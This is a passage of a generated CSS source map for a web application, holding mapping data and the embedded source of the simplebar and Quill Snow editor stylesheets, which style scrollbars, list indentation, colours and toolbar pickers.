ACF,CAEA,gBAGE,kBAAmB,CAFnB,YAAa,CACb,6BAEF,CAEA,gBAIE,iBACF,CAEA,2BAJE,kBAAmB,CAFnB,YAAa,CACb,sBAUF,CALA,WAIE,WACF,CAEA,sBACE,yBAAsC,CAOtC,kBAAmB,CACnB,kCAA8C,CAL9C,YAAa,CADb,WAAY,CAEZ,0BAA2B,CAE3B,qBAAgB,CALhB,SAQF,CAEA,aAIE,8BAA+B,CAD/B,2BAA4B,CAD5B,WAAY,CAGZ,YAAe,CAJf,SAKF,CAEA,2BAGE,UAAW,CAGX,iBAAmB,CAJnB,SAKF,CAEA,kCACI,UACJ,CAEA,oBASE,sBAAuB,CAHvB,YAAa,CACb,qBAAsB,CALtB,WAAY,CAMZ,wBAAyB,CAJzB,gBAAiB,CACjB,iBAAkB,CAFlB,SAOF,CAEA,2BAKI,kBAAmB,CAHnB,UAAW,CADX,0BAA2B,CAG3B,kBAAmB,CADnB,UAGJ,CAEA,0BAEI,WAAY,CADZ,sBAEJ,CAEA,UACE,eAAgB,CAChB,kBACF,CAEA,sBAGE,WAAY,CAEZ,gBAAiB,CACjB,iBAAkB,CALlB,eAAgB,CAGhB,SAGF,CAEA,6BACI,cACJ,CAEA,4BAEI,WAAY,CADZ,YAEJ,CAEA,YAEE,cAAe,CADf,aAEF,CAEA,mBACI,cACJ,CAEA,aACE,sBAAwB,CACxB,iBAAkB,CAGlB,WAAY,CADZ,eAAgB,CAEhB,YAAa,CAHb,SAIF,CAEA,oBACI,cAAe,CACf,WACJ,CAEA,6BAGE,WAAY,CAEZ,gBAAiB,CACjB,iBAAkB,CALlB,eAAgB,CAGhB,SAGF,CAEA,mCACI,eACJ,CAEA,wBAIE,wBAAyB,CAGzB,QAAW,CAJX,iBAAkB,CAElB,UAAY,CAGZ,cAAe,CAFf,cAAe,CAJf,YAAa,CADb,SAQF,CAEA,+BACE,iCAA0B,CAA1B,yBACF,CAOA,2CAJE,aAAsB,CACtB,gBASF,CANA,sBAGE,WAAY,CACZ,iBAAkB,CAClB,eACF,CAEA,eAEI,iBAAkB,CAGlB,yBAAkB,CAJlB,YAKJ,CAEA,gBACE,gBAAiB,CACjB,mBACF,CAEA,cACE,yBAAsC,CAEtC,kBAAmB,CAEnB,kCAA8C,CAH9C,eAAgB,CAEhB,YAEF,CAEA,qBACE,gBAAiB,CACjB,kBACF,CAEA,sBACE,YACF,CAEA,gCACE,oBAAqB,CAGrB,cAAe,CAFf,eAAgB,CAChB,mBAAqB,CAErB,iBAAkB,CAClB,gBACF,CAEA,iCASE,wBAAoC,CADpC,wBAAoC,CADpC,kBAAmB,CANnB,WAAY,CAKZ,kBAAmB,CAHnB,kBAAmB,CADnB,gBAAiB,CAGjB,YAAa,CADb,WAMF,CAEA,aACE,QACF,CAEA,kCAQE,wBAAyB,CADzB,QAAS,CADT,kBAAmB,CAInB,UAAY,CACZ,cAAe,CAFf,cAAe,CAPf,WAAY,CAGZ,kBAAmB,CAJnB,gBAAiB,CAGjB,YAAa,CADb,WASF,CAEA,SAEE,qBAAuB,CADvB,aAEF,CAEA,eAGE,iBAAkB,CAFlB,eAAgB,CAGhB,YACF,CACA,oBACE,wBAAyB,CAEzB,oBAAqB,CACrB,gBACF","sources":["../node_modules/simplebar/src/simplebar.css","../node_modules/react-quill/dist/quill.snow.css","pages/App.css"],"sourcesContent":["[data-simplebar] {\n position: relative;\n flex-direction: column;\n flex-wrap: wrap;\n justify-content: flex-start;\n align-content: flex-start;\n align-items: flex-start;\n}\n\n.simplebar-wrapper {\n overflow: hidden;\n width: inherit;\n height: inherit;\n max-width: inherit;\n max-height: inherit;\n}\n\n.simplebar-mask {\n direction: inherit;\n position: absolute;\n overflow: hidden;\n padding: 0;\n margin: 0;\n left: 0;\n top: 0;\n bottom: 0;\n right: 0;\n width: auto !important;\n height: auto !important;\n z-index: 0;\n}\n\n.simplebar-offset {\n direction: inherit !important;\n box-sizing: inherit !important;\n resize: none !important;\n position: absolute;\n top: 0;\n left: 0;\n bottom: 0;\n right: 0;\n padding: 0;\n margin: 0;\n -webkit-overflow-scrolling: touch;\n}\n\n.simplebar-content-wrapper {\n direction: inherit;\n box-sizing: border-box !important;\n position: relative;\n display: block;\n height: 100%; /* Required for horizontal native scrollbar to not appear if parent is taller than natural height */\n width: auto;\n max-width: 100%; /* Not required for horizontal scroll to trigger */\n max-height: 100%; /* Needed for vertical scroll to trigger */\n scrollbar-width: none;\n -ms-overflow-style: none;\n}\n\n.simplebar-content-wrapper::-webkit-scrollbar,\n.simplebar-hide-scrollbar::-webkit-scrollbar {\n width: 0;\n height: 0;\n}\n\n.simplebar-content:before,\n.simplebar-content:after {\n content: ' ';\n display: table;\n}\n\n.simplebar-placeholder {\n max-height: 100%;\n max-width: 100%;\n width: 100%;\n pointer-events: none;\n}\n\n.simplebar-height-auto-observer-wrapper {\n box-sizing: inherit !important;\n height: 100%;\n width: 100%;\n max-width: 1px;\n position: relative;\n float: left;\n max-height: 1px;\n overflow: hidden;\n z-index: -1;\n padding: 0;\n margin: 0;\n pointer-events: none;\n flex-grow: inherit;\n flex-shrink: 0;\n flex-basis: 0;\n}\n\n.simplebar-height-auto-observer {\n box-sizing: inherit;\n display: block;\n opacity: 0;\n position: absolute;\n top: 0;\n left: 0;\n height: 1000%;\n width: 1000%;\n min-height: 1px;\n min-width: 1px;\n overflow: hidden;\n pointer-events: none;\n z-index: -1;\n}\n\n.simplebar-track {\n z-index: 1;\n position: absolute;\n right: 0;\n bottom: 0;\n pointer-events: none;\n overflow: hidden;\n}\n\n[data-simplebar].simplebar-dragging .simplebar-content {\n pointer-events: none;\n user-select: none;\n -webkit-user-select: none;\n}\n\n[data-simplebar].simplebar-dragging .simplebar-track {\n pointer-events: all;\n}\n\n.simplebar-scrollbar {\n position: absolute;\n left: 0;\n right: 0;\n min-height: 10px;\n}\n\n.simplebar-scrollbar:before {\n position: absolute;\n content: '';\n background: black;\n border-radius: 7px;\n left: 2px;\n right: 2px;\n opacity: 0;\n transition: opacity 0.2s linear;\n}\n\n.simplebar-scrollbar.simplebar-visible:before {\n /* When hovered, remove all transitions from drag handle */\n opacity: 0.5;\n transition: opacity 0s linear;\n}\n\n.simplebar-track.simplebar-vertical {\n top: 0;\n width: 11px;\n}\n\n.simplebar-track.simplebar-vertical .simplebar-scrollbar:before {\n top: 2px;\n bottom: 2px;\n}\n\n.simplebar-track.simplebar-horizontal {\n left: 0;\n height: 11px;\n}\n\n.simplebar-track.simplebar-horizontal .simplebar-scrollbar:before {\n height: 100%;\n left: 2px;\n right: 2px;\n}\n\n.simplebar-track.simplebar-horizontal .simplebar-scrollbar {\n right: auto;\n left: 0;\n top: 2px;\n height: 7px;\n min-height: 0;\n min-width: 10px;\n width: auto;\n}\n\n/* Rtl support */\n[data-simplebar-direction='rtl'] .simplebar-track.simplebar-vertical {\n right: auto;\n left: 0;\n}\n\n.hs-dummy-scrollbar-size {\n direction: rtl;\n position: fixed;\n opacity: 0;\n visibility: hidden;\n height: 500px;\n width: 500px;\n overflow-y: hidden;\n overflow-x: scroll;\n}\n\n.simplebar-hide-scrollbar {\n position: fixed;\n left: 0;\n visibility: hidden;\n overflow-y: scroll;\n scrollbar-width: none;\n -ms-overflow-style: none;\n}\n","/*!\n * Quill Editor v1.3.7\n * https://quilljs.com/\n * Copyright (c) 2014, Jason Chen\n * Copyright (c) 2013, salesforce.com\n */\n.ql-container {\n box-sizing: border-box;\n font-family: Helvetica, Arial, sans-serif;\n font-size: 13px;\n height: 100%;\n margin: 0px;\n position: relative;\n}\n.ql-container.ql-disabled .ql-tooltip {\n visibility: hidden;\n}\n.ql-container.ql-disabled .ql-editor ul[data-checked] > li::before {\n pointer-events: none;\n}\n.ql-clipboard {\n left: -100000px;\n height: 1px;\n overflow-y: hidden;\n position: absolute;\n top: 50%;\n}\n.ql-clipboard p {\n margin: 0;\n padding: 0;\n}\n.ql-editor {\n box-sizing: border-box;\n line-height: 1.42;\n height: 100%;\n outline: none;\n overflow-y: auto;\n padding: 12px 15px;\n tab-size: 4;\n -moz-tab-size: 4;\n text-align: left;\n white-space: pre-wrap;\n word-wrap: break-word;\n}\n.ql-editor > * {\n cursor: text;\n}\n.ql-editor p,\n.ql-editor ol,\n.ql-editor ul,\n.ql-editor pre,\n.ql-editor blockquote,\n.ql-editor h1,\n.ql-editor h2,\n.ql-editor h3,\n.ql-editor h4,\n.ql-editor h5,\n.ql-editor h6 {\n margin: 0;\n padding: 0;\n counter-reset: list-1 list-2 list-3 list-4 list-5 list-6 list-7 list-8 list-9;\n}\n.ql-editor ol,\n.ql-editor ul {\n padding-left: 1.5em;\n}\n.ql-editor ol > li,\n.ql-editor ul > li {\n list-style-type: none;\n}\n.ql-editor ul > li::before {\n content: '\\2022';\n}\n.ql-editor ul[data-checked=true],\n.ql-editor ul[data-checked=false] {\n pointer-events: none;\n}\n.ql-editor ul[data-checked=true] > li *,\n.ql-editor ul[data-checked=false] > li * {\n pointer-events: all;\n}\n.ql-editor ul[data-checked=true] > li::before,\n.ql-editor ul[data-checked=false] > li::before {\n color: #777;\n cursor: pointer;\n pointer-events: all;\n}\n.ql-editor ul[data-checked=true] > li::before {\n content: '\\2611';\n}\n.ql-editor ul[data-checked=false] > li::before {\n content: '\\2610';\n}\n.ql-editor li::before {\n display: inline-block;\n white-space: nowrap;\n width: 1.2em;\n}\n.ql-editor li:not(.ql-direction-rtl)::before {\n margin-left: -1.5em;\n margin-right: 0.3em;\n text-align: right;\n}\n.ql-editor li.ql-direction-rtl::before {\n margin-left: 0.3em;\n margin-right: -1.5em;\n}\n.ql-editor ol li:not(.ql-direction-rtl),\n.ql-editor ul li:not(.ql-direction-rtl) {\n padding-left: 1.5em;\n}\n.ql-editor ol li.ql-direction-rtl,\n.ql-editor ul li.ql-direction-rtl {\n padding-right: 1.5em;\n}\n.ql-editor ol li {\n counter-reset: list-1 list-2 list-3 list-4 list-5 list-6 list-7 list-8 list-9;\n counter-increment: list-0;\n}\n.ql-editor ol li:before {\n content: counter(list-0, decimal) '. ';\n}\n.ql-editor ol li.ql-indent-1 {\n counter-increment: list-1;\n}\n.ql-editor ol li.ql-indent-1:before {\n content: counter(list-1, lower-alpha) '. ';\n}\n.ql-editor ol li.ql-indent-1 {\n counter-reset: list-2 list-3 list-4 list-5 list-6 list-7 list-8 list-9;\n}\n.ql-editor ol li.ql-indent-2 {\n counter-increment: list-2;\n}\n.ql-editor ol li.ql-indent-2:before {\n content: counter(list-2, lower-roman) '. ';\n}\n.ql-editor ol li.ql-indent-2 {\n counter-reset: list-3 list-4 list-5 list-6 list-7 list-8 list-9;\n}\n.ql-editor ol li.ql-indent-3 {\n counter-increment: list-3;\n}\n.ql-editor ol li.ql-indent-3:before {\n content: counter(list-3, decimal) '. ';\n}\n.ql-editor ol li.ql-indent-3 {\n counter-reset: list-4 list-5 list-6 list-7 list-8 list-9;\n}\n.ql-editor ol li.ql-indent-4 {\n counter-increment: list-4;\n}\n.ql-editor ol li.ql-indent-4:before {\n content: counter(list-4, lower-alpha) '. ';\n}\n.ql-editor ol li.ql-indent-4 {\n counter-reset: list-5 list-6 list-7 list-8 list-9;\n}\n.ql-editor ol li.ql-indent-5 {\n counter-increment: list-5;\n}\n.ql-editor ol li.ql-indent-5:before {\n content: counter(list-5, lower-roman) '. ';\n}\n.ql-editor ol li.ql-indent-5 {\n counter-reset: list-6 list-7 list-8 list-9;\n}\n.ql-editor ol li.ql-indent-6 {\n counter-increment: list-6;\n}\n.ql-editor ol li.ql-indent-6:before {\n content: counter(list-6, decimal) '. ';\n}\n.ql-editor ol li.ql-indent-6 {\n counter-reset: list-7 list-8 list-9;\n}\n.ql-editor ol li.ql-indent-7 {\n counter-increment: list-7;\n}\n.ql-editor ol li.ql-indent-7:before {\n content: counter(list-7, lower-alpha) '. ';\n}\n.ql-editor ol li.ql-indent-7 {\n counter-reset: list-8 list-9;\n}\n.ql-editor ol li.ql-indent-8 {\n counter-increment: list-8;\n}\n.ql-editor ol li.ql-indent-8:before {\n content: counter(list-8, lower-roman) '. ';\n}\n.ql-editor ol li.ql-indent-8 {\n counter-reset: list-9;\n}\n.ql-editor ol li.ql-indent-9 {\n counter-increment: list-9;\n}\n.ql-editor ol li.ql-indent-9:before {\n content: counter(list-9, decimal) '. ';\n}\n.ql-editor .ql-indent-1:not(.ql-direction-rtl) {\n padding-left: 3em;\n}\n.ql-editor li.ql-indent-1:not(.ql-direction-rtl) {\n padding-left: 4.5em;\n}\n.ql-editor .ql-indent-1.ql-direction-rtl.ql-align-right {\n padding-right: 3em;\n}\n.ql-editor li.ql-indent-1.ql-direction-rtl.ql-align-right {\n padding-right: 4.5em;\n}\n.ql-editor .ql-indent-2:not(.ql-direction-rtl) {\n padding-left: 6em;\n}\n.ql-editor li.ql-indent-2:not(.ql-direction-rtl) {\n padding-left: 7.5em;\n}\n.ql-editor .ql-indent-2.ql-direction-rtl.ql-align-right {\n padding-right: 6em;\n}\n.ql-editor li.ql-indent-2.ql-direction-rtl.ql-align-right {\n padding-right: 7.5em;\n}\n.ql-editor .ql-indent-3:not(.ql-direction-rtl) {\n padding-left: 9em;\n}\n.ql-editor li.ql-indent-3:not(.ql-direction-rtl) {\n padding-left: 10.5em;\n}\n.ql-editor .ql-indent-3.ql-direction-rtl.ql-align-right {\n padding-right: 9em;\n}\n.ql-editor li.ql-indent-3.ql-direction-rtl.ql-align-right {\n padding-right: 10.5em;\n}\n.ql-editor .ql-indent-4:not(.ql-direction-rtl) {\n padding-left: 12em;\n}\n.ql-editor li.ql-indent-4:not(.ql-direction-rtl) {\n padding-left: 13.5em;\n}\n.ql-editor .ql-indent-4.ql-direction-rtl.ql-align-right {\n padding-right: 12em;\n}\n.ql-editor li.ql-indent-4.ql-direction-rtl.ql-align-right {\n padding-right: 13.5em;\n}\n.ql-editor .ql-indent-5:not(.ql-direction-rtl) {\n padding-left: 15em;\n}\n.ql-editor li.ql-indent-5:not(.ql-direction-rtl) {\n padding-left: 16.5em;\n}\n.ql-editor .ql-indent-5.ql-direction-rtl.ql-align-right {\n padding-right: 15em;\n}\n.ql-editor li.ql-indent-5.ql-direction-rtl.ql-align-right {\n padding-right: 16.5em;\n}\n.ql-editor .ql-indent-6:not(.ql-direction-rtl) {\n padding-left: 18em;\n}\n.ql-editor li.ql-indent-6:not(.ql-direction-rtl) {\n padding-left: 19.5em;\n}\n.ql-editor .ql-indent-6.ql-direction-rtl.ql-align-right {\n padding-right: 18em;\n}\n.ql-editor li.ql-indent-6.ql-direction-rtl.ql-align-right {\n padding-right: 19.5em;\n}\n.ql-editor .ql-indent-7:not(.ql-direction-rtl) {\n padding-left: 21em;\n}\n.ql-editor li.ql-indent-7:not(.ql-direction-rtl) {\n padding-left: 22.5em;\n}\n.ql-editor .ql-indent-7.ql-direction-rtl.ql-align-right {\n padding-right: 21em;\n}\n.ql-editor li.ql-indent-7.ql-direction-rtl.ql-align-right {\n padding-right: 22.5em;\n}\n.ql-editor .ql-indent-8:not(.ql-direction-rtl) {\n padding-left: 24em;\n}\n.ql-editor li.ql-indent-8:not(.ql-direction-rtl) {\n padding-left: 25.5em;\n}\n.ql-editor .ql-indent-8.ql-direction-rtl.ql-align-right {\n padding-right: 24em;\n}\n.ql-editor li.ql-indent-8.ql-direction-rtl.ql-align-right {\n padding-right: 25.5em;\n}\n.ql-editor .ql-indent-9:not(.ql-direction-rtl) {\n padding-left: 27em;\n}\n.ql-editor li.ql-indent-9:not(.ql-direction-rtl) {\n padding-left: 28.5em;\n}\n.ql-editor .ql-indent-9.ql-direction-rtl.ql-align-right {\n padding-right: 27em;\n}\n.ql-editor li.ql-indent-9.ql-direction-rtl.ql-align-right {\n padding-right: 28.5em;\n}\n.ql-editor .ql-video {\n display: block;\n max-width: 100%;\n}\n.ql-editor .ql-video.ql-align-center {\n margin: 0 auto;\n}\n.ql-editor .ql-video.ql-align-right {\n margin: 0 0 0 auto;\n}\n.ql-editor .ql-bg-black {\n background-color: #000;\n}\n.ql-editor .ql-bg-red {\n background-color: #e60000;\n}\n.ql-editor .ql-bg-orange {\n background-color: #f90;\n}\n.ql-editor .ql-bg-yellow {\n background-color: #ff0;\n}\n.ql-editor .ql-bg-green {\n background-color: #008a00;\n}\n.ql-editor .ql-bg-blue {\n background-color: #06c;\n}\n.ql-editor .ql-bg-purple {\n background-color: #93f;\n}\n.ql-editor .ql-color-white {\n color: #fff;\n}\n.ql-editor .ql-color-red {\n color: #e60000;\n}\n.ql-editor .ql-color-orange {\n color: #f90;\n}\n.ql-editor .ql-color-yellow {\n color: #ff0;\n}\n.ql-editor .ql-color-green {\n color: #008a00;\n}\n.ql-editor .ql-color-blue {\n color: #06c;\n}\n.ql-editor .ql-color-purple {\n color: #93f;\n}\n.ql-editor .ql-font-serif {\n font-family: Georgia, Times New Roman, serif;\n}\n.ql-editor .ql-font-monospace {\n font-family: Monaco, Courier New, monospace;\n}\n.ql-editor .ql-size-small {\n font-size: 0.75em;\n}\n.ql-editor .ql-size-large {\n font-size: 1.5em;\n}\n.ql-editor .ql-size-huge {\n font-size: 2.5em;\n}\n.ql-editor .ql-direction-rtl {\n direction: rtl;\n text-align: inherit;\n}\n.ql-editor .ql-align-center {\n text-align: center;\n}\n.ql-editor .ql-align-justify {\n text-align: justify;\n}\n.ql-editor .ql-align-right {\n text-align: right;\n}\n.ql-editor.ql-blank::before {\n color: rgba(0,0,0,0.6);\n content: attr(data-placeholder);\n font-style: italic;\n left: 15px;\n pointer-events: none;\n position: absolute;\n right: 15px;\n}\n.ql-snow.ql-toolbar:after,\n.ql-snow .ql-toolbar:after {\n clear: both;\n content: '';\n display: table;\n}\n.ql-snow.ql-toolbar button,\n.ql-snow .ql-toolbar button {\n background: none;\n border: none;\n cursor: pointer;\n display: inline-block;\n float: left;\n height: 24px;\n padding: 3px 5px;\n width: 28px;\n}\n.ql-snow.ql-toolbar button svg,\n.ql-snow .ql-toolbar button svg {\n float: left;\n height: 100%;\n}\n.ql-snow.ql-toolbar button:active:hover,\n.ql-snow .ql-toolbar button:active:hover {\n outline: none;\n}\n.ql-snow.ql-toolbar input.ql-image[type=file],\n.ql-snow .ql-toolbar input.ql-image[type=file] {\n display: none;\n}\n.ql-snow.ql-toolbar button:hover,\n.ql-snow .ql-toolbar button:hover,\n.ql-snow.ql-toolbar button:focus,\n.ql-snow .ql-toolbar button:focus,\n.ql-snow.ql-toolbar button.ql-active,\n.ql-snow .ql-toolbar button.ql-active,\n.ql-snow.ql-toolbar .ql-picker-label:hover,\n.ql-snow .ql-toolbar .ql-picker-label:hover,\n.ql-snow.ql-toolbar .ql-picker-label.ql-active,\n.ql-snow .ql-toolbar .ql-picker-label.ql-active,\n.ql-snow.ql-toolbar .ql-picker-item:hover,\n.ql-snow .ql-toolbar .ql-picker-item:hover,\n.ql-snow.ql-toolbar .ql-picker-item.ql-selected,\n.ql-snow .ql-toolbar .ql-picker-item.ql-selected {\n color: #06c;\n}\n.ql-snow.ql-toolbar button:hover .ql-fill,\n.ql-snow .ql-toolbar button:hover .ql-fill,\n.ql-snow.ql-toolbar button:focus .ql-fill,\n.ql-snow .ql-toolbar button:focus .ql-fill,\n.ql-snow.ql-toolbar button.ql-active .ql-fill,\n.ql-snow .ql-toolbar button.ql-active .ql-fill,\n.ql-snow.ql-toolbar .ql-picker-label:hover .ql-fill,\n.ql-snow .ql-toolbar .ql-picker-label:hover .ql-fill,\n.ql-snow.ql-toolbar .ql-picker-label.ql-active .ql-fill,\n.ql-snow .ql-toolbar .ql-picker-label.ql-active .ql-fill,\n.ql-snow.ql-toolbar .ql-picker-item:hover .ql-fill,\n.ql-snow .ql-toolbar .ql-picker-item:hover .ql-fill,\n.ql-snow.ql-toolbar .ql-picker-item.ql-selected .ql-fill,\n.ql-snow .ql-toolbar .ql-picker-item.ql-selected .ql-fill,\n.ql-snow.ql-toolbar button:hover .ql-stroke.ql-fill,\n.ql-snow .ql-toolbar button:hover .ql-stroke.ql-fill,\n.ql-snow.ql-toolbar button:focus .ql-stroke.ql-fill,\n.ql-snow .ql-toolbar button:focus .ql-stroke.ql-fill,\n.ql-snow.ql-toolbar button.ql-active .ql-stroke.ql-fill,\n.ql-snow .ql-toolbar button.ql-active .ql-stroke.ql-fill,\n.ql-snow.ql-toolbar .ql-picker-label:hover .ql-stroke.ql-fill,\n.ql-snow .ql-toolbar .ql-picker-label:hover .ql-stroke.ql-fill,\n.ql-snow.ql-toolbar .ql-picker-label.ql-active .ql-stroke.ql-fill,\n.ql-snow .ql-toolbar .ql-picker-label.ql-active .ql-stroke.ql-fill,\n.ql-snow.ql-toolbar .ql-picker-item:hover .ql-stroke.ql-fill,\n.ql-snow .ql-toolbar .ql-picker-item:hover .ql-stroke.ql-fill,\n.ql-snow.ql-toolbar .ql-picker-item.ql-selected .ql-stroke.ql-fill,\n.ql-snow .ql-toolbar .ql-picker-item.ql-selected .ql-stroke.ql-fill {\n fill: #06c;\n}\n.ql-snow.ql-toolbar button:hover .ql-stroke,\n.ql-snow .ql-toolbar button:hover .ql-stroke,\n.ql-snow.ql-toolbar button:focus .ql-stroke,\n.ql-snow .ql-toolbar button:focus .ql-stroke,\n.ql-snow.ql-toolbar button.ql-active .ql-stroke,\n.ql-snow .ql-toolbar button.ql-active .ql-stroke,\n.ql-snow.ql-toolbar .ql-picker-label:hover .ql-stroke,\n.ql-snow .ql-toolbar .ql-picker-label:hover .ql-stroke,\n.ql-snow.ql-toolbar .ql-picker-label.ql-active .ql-stroke,\n.ql-snow .ql-toolbar .ql-picker-label.ql-active .ql-stroke,\n.ql-snow.ql-toolbar .ql-picker-item:hover .ql-stroke,\n.ql-snow .ql-toolbar .ql-picker-item:hover .ql-stroke,\n.ql-snow.ql-toolbar .ql-picker-item.ql-selected .ql-stroke,\n.ql-snow .ql-toolbar .ql-picker-item.ql-selected .ql-stroke,\n.ql-snow.ql-toolbar button:hover .ql-stroke-miter,\n.ql-snow .ql-toolbar button:hover .ql-stroke-miter,\n.ql-snow.ql-toolbar button:focus .ql-stroke-miter,\n.ql-snow .ql-toolbar button:focus .ql-stroke-miter,\n.ql-snow.ql-toolbar button.ql-active .ql-stroke-miter,\n.ql-snow .ql-toolbar button.ql-active .ql-stroke-miter,\n.ql-snow.ql-toolbar .ql-picker-label:hover .ql-stroke-miter,\n.ql-snow .ql-toolbar .ql-picker-label:hover .ql-stroke-miter,\n.ql-snow.ql-toolbar .ql-picker-label.ql-active .ql-stroke-miter,\n.ql-snow .ql-toolbar .ql-picker-label.ql-active .ql-stroke-miter,\n.ql-snow.ql-toolbar .ql-picker-item:hover .ql-stroke-miter,\n.ql-snow .ql-toolbar .ql-picker-item:hover .ql-stroke-miter,\n.ql-snow.ql-toolbar .ql-picker-item.ql-selected .ql-stroke-miter,\n.ql-snow .ql-toolbar .ql-picker-item.ql-selected .ql-stroke-miter {\n stroke: #06c;\n}\n@media (pointer: coarse) {\n .ql-snow.ql-toolbar button:hover:not(.ql-active),\n .ql-snow .ql-toolbar button:hover:not(.ql-active) {\n color: #444;\n }\n .ql-snow.ql-toolbar button:hover:not(.ql-active) .ql-fill,\n .ql-snow .ql-toolbar button:hover:not(.ql-active) .ql-fill,\n .ql-snow.ql-toolbar button:hover:not(.ql-active) .ql-stroke.ql-fill,\n .ql-snow .ql-toolbar button:hover:not(.ql-active) .ql-stroke.ql-fill {\n fill: #444;\n }\n .ql-snow.ql-toolbar button:hover:not(.ql-active) .ql-stroke,\n .ql-snow .ql-toolbar button:hover:not(.ql-active) .ql-stroke,\n .ql-snow.ql-toolbar button:hover:not(.ql-active) .ql-stroke-miter,\n .ql-snow .ql-toolbar button:hover:not(.ql-active) .ql-stroke-miter {\n stroke: #444;\n }\n}\n.ql-snow {\n box-sizing: border-box;\n}\n.ql-snow * {\n box-sizing: border-box;\n}\n.ql-snow .ql-hidden {\n display: none;\n}\n.ql-snow .ql-out-bottom,\n.ql-snow .ql-out-top {\n visibility: hidden;\n}\n.ql-snow .ql-tooltip {\n position: absolute;\n transform: translateY(10px);\n}\n.ql-snow .ql-tooltip a {\n cursor: pointer;\n text-decoration: none;\n}\n.ql-snow .ql-tooltip.ql-flip {\n transform: translateY(-10px);\n}\n.ql-snow .ql-formats {\n display: inline-block;\n vertical-align: middle;\n}\n.ql-snow .ql-formats:after {\n clear: both;\n content: '';\n display: table;\n}\n.ql-snow .ql-stroke {\n fill: none;\n stroke: #444;\n stroke-linecap: round;\n stroke-linejoin: round;\n stroke-width: 2;\n}\n.ql-snow .ql-stroke-miter {\n fill: none;\n stroke: #444;\n stroke-miterlimit: 10;\n stroke-width: 2;\n}\n.ql-snow .ql-fill,\n.ql-snow .ql-stroke.ql-fill {\n fill: #444;\n}\n.ql-snow .ql-empty {\n fill: none;\n}\n.ql-snow .ql-even {\n fill-rule: evenodd;\n}\n.ql-snow .ql-thin,\n.ql-snow .ql-stroke.ql-thin {\n stroke-width: 1;\n}\n.ql-snow .ql-transparent {\n opacity: 0.4;\n}\n.ql-snow .ql-direction svg:last-child {\n display: none;\n}\n.ql-snow .ql-direction.ql-active svg:last-child {\n display: inline;\n}\n.ql-snow .ql-direction.ql-active svg:first-child {\n display: none;\n}\n.ql-snow .ql-editor h1 {\n font-size: 2em;\n}\n.ql-snow .ql-editor h2 {\n font-size: 1.5em;\n}\n.ql-snow .ql-editor h3 {\n font-size: 1.17em;\n}\n.ql-snow .ql-editor h4 {\n font-size: 1em;\n}\n.ql-snow .ql-editor h5 {\n font-size: 0.83em;\n}\n.ql-snow .ql-editor h6 {\n font-size: 0.67em;\n}\n.ql-snow .ql-editor a {\n text-decoration: underline;\n}\n.ql-snow .ql-editor blockquote {\n border-left: 4px solid #ccc;\n margin-bottom: 5px;\n margin-top: 5px;\n padding-left: 16px;\n}\n.ql-snow .ql-editor code,\n.ql-snow .ql-editor pre {\n background-color: #f0f0f0;\n border-radius: 3px;\n}\n.ql-snow .ql-editor pre {\n white-space: pre-wrap;\n margin-bottom: 5px;\n margin-top: 5px;\n padding: 5px 10px;\n}\n.ql-snow .ql-editor code {\n font-size: 85%;\n padding: 2px 4px;\n}\n.ql-snow .ql-editor pre.ql-syntax {\n background-color: #23241f;\n color: #f8f8f2;\n overflow: visible;\n}\n.ql-snow .ql-editor img {\n max-width: 100%;\n}\n.ql-snow .ql-picker {\n color: #444;\n display: inline-block;\n float: left;\n font-size: 14px;\n font-weight: 500;\n height: 24px;\n position: relative;\n vertical-align: middle;\n}\n.ql-snow .ql-picker-label {\n cursor: pointer;\n display: inline-block;\n height: 100%;\n padding-left: 8px;\n padding-right: 2px;\n position: relative;\n width: 100%;\n}\n.ql-snow .ql-picker-label::before {\n display: inline-block;\n line-height: 22px;\n}\n.ql-snow .ql-picker-options {\n background-color: #fff;\n display: none;\n min-width: 100%;\n padding: 4px 8px;\n position: absolute;\n white-space: nowrap;\n}\n.ql-snow .ql-picker-options .ql-picker-item {\n cursor: pointer;\n display: block;\n padding-bottom: 5px;\n padding-top: 5px;\n}\n.ql-snow .ql-picker.ql-expanded .ql-picker-label {\n color: #ccc;\n z-index: 2;\n}\n.ql-snow .ql-picker.ql-expanded .ql-picker-label .ql-fill {\n fill: #ccc;\n}\n.ql-snow .ql-picker.ql-expanded .ql-picker-label .ql-stroke {\n stroke: #ccc;\n}\n.ql-snow .ql-picker.ql-expanded .ql-picker-options {\n display: block;\n margin-top: -1px;\n top: 100%;\n z-index: 1;\n}\n.ql-snow .ql-color-picker,\n.ql-snow .ql-icon-picker {\n width: 28px;\n}\n.ql-snow .ql-color-picker .ql-picker-label,\n.ql-snow .ql-icon-picker .ql-picker-label {\n padding: 2px 4px;\n}\n.ql-snow .ql-color-picker .ql-picker-label svg,\n.ql-snow .ql-icon-picker .ql-picker-label svg {\n right: 4px;\n}\n.ql-snow .ql-icon-picker .ql-picker-options {\n padding: 4px 0px;\n}\n.ql-snow .ql-icon-picker .ql-picker-item {\n height: 24px;\n width: 24px;\n padding: 2px 4px;\n}\n.ql-snow .ql-color-picker .ql-picker-options {\n padding: 3px 5px;\n width: 152px;\n}\n.ql-snow .ql-color-picker .ql-picker-item {\n border: 1px solid transparent;\n float: left;\n height: 16px;\n margin: 2px;\n padding: 0px;\n width: 16px;\n}\n.ql-snow .ql-picker:not(.ql-color-picker):not(.ql-icon-picker) svg {\n position: absolute;\n margin-top: -9px;\n right: 0;\n top: 50%;\n width: 18px;\n}\n.ql-snow .ql-picker.ql-header .ql-picker-label[data-label]:not([data-label=''])::before,\n.ql-snow .ql-picker.ql-font .ql-picker-label[data-label]:not([data-label=''])::before,\n.ql-snow .ql-picker.ql-size .ql-picker-label[data-label]:not([data-label=''])::before,\n.ql-snow .ql-picker.ql-header .ql-picker-item[data-label]:not([data-label=''])::before,\n.ql-snow .ql-picker.ql-font .ql-picker-item[data-label]:not([data-label=''])::before,\n.ql-snow .ql-picker.ql-size .ql-picker-item[data-label]:not([data-label=''])::before {\n content: attr(data-label);\n}\n.ql-snow .ql-picker.ql-header {\n width: 98px;\n}\n.ql-snow .ql-picker.ql-header .ql-picker-label::before,\n.ql-snow .ql-picker.ql-header .ql-picker-item::before {\n content: 'Normal';\n}\n.ql-snow .ql-picker.ql-header .ql-picker-label[data-value=\"1\"]::before,\n.ql-snow .ql-picker.ql-header .ql-picker-item[data-value=\"1\"]::before {\n content: 'Heading 1';\n}\n.ql-snow .ql-picker.ql-header .ql-picker-label[data-value=\"2\"]::before,\n.ql-snow .ql-picker.ql-header .ql-picker-item[data-value=\"2\"]::before {\n content: 'Heading 2';\n}\n.ql-snow .ql-picker.ql-header .ql-picker-label[data-value=\"3\"]::before,\n.ql-snow .ql-picker.ql-header 